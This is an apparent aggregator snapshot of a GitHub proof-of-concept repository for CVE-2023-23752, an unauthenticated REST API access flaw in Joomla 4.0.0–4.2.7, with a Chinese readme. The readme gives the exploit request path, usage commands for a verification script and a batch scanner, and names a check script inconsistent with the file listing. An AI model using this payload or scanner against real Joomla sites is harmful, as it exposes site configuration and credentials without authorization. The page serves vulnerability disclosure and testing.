CVE-2023-23752 PoC — Joomla 安全漏洞

Source

https://github.com/yTxZx/CVE-2023-23752

Associated Vulnerability

Title:Joomla 安全漏洞 (CVE-2023-23752)
Description:Joomla是美国Open Source Matters团队的一套使用PHP和MySQL开发的开源、跨平台的内容管理系统(CMS)。 Joomla 4.0.0版本至4.2.7版本存在安全漏洞，该漏洞源于不正确的访问检查，允许对web服务端点进行未经授权的访问。

Readme

CVE-2023-23752 - Recurrence of Joomla Unauthorized Access Vulnerability

# 脚本使用

安装python库

pip install -r requirements.txt

漏洞验证

python3 CVE-2022-26134_check.py -u url -c whoami

![image](https://github.com/yTxZx/CVE-2023-23752/assets/100921463/ef65c7d4-93c9-477d-86c1-f3e5d2daf288)


批量扫描

python3 CVE-2023-23752.py -f url_part.txt

![image](https://github.com/yTxZx/CVE-2023-23752/assets/100921463/e4125dc6-8590-4835-90ba-5c3d878dff3e)

# 影响版本

4.0.0 <= Joomla <= 4.2.7

# 漏洞复现

payload:

/api/index.php/v1/config/application?public=true

访问漏洞地址，抓包，重放数据包

![image](https://github.com/yTxZx/CVE-2023-23752/assets/100921463/6ee54b44-4de9-46a4-95e9-8357c6ca0aa4)

# 漏洞原理

Joomla! CMS 版本4.0.0- 4.2.7中由于对web 服务端点访问限制不当，可能导致未授权访问Rest API，造成敏感信息泄露

File Snapshot


 [4.0K]  /data/pocs/d8929767fee2b4f98473052d2c342917ef23a557
├── [5.2K]  CVE-2023-23752.py
├── [ 899]  README.md
└── [  60]  requirements.txt

0 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!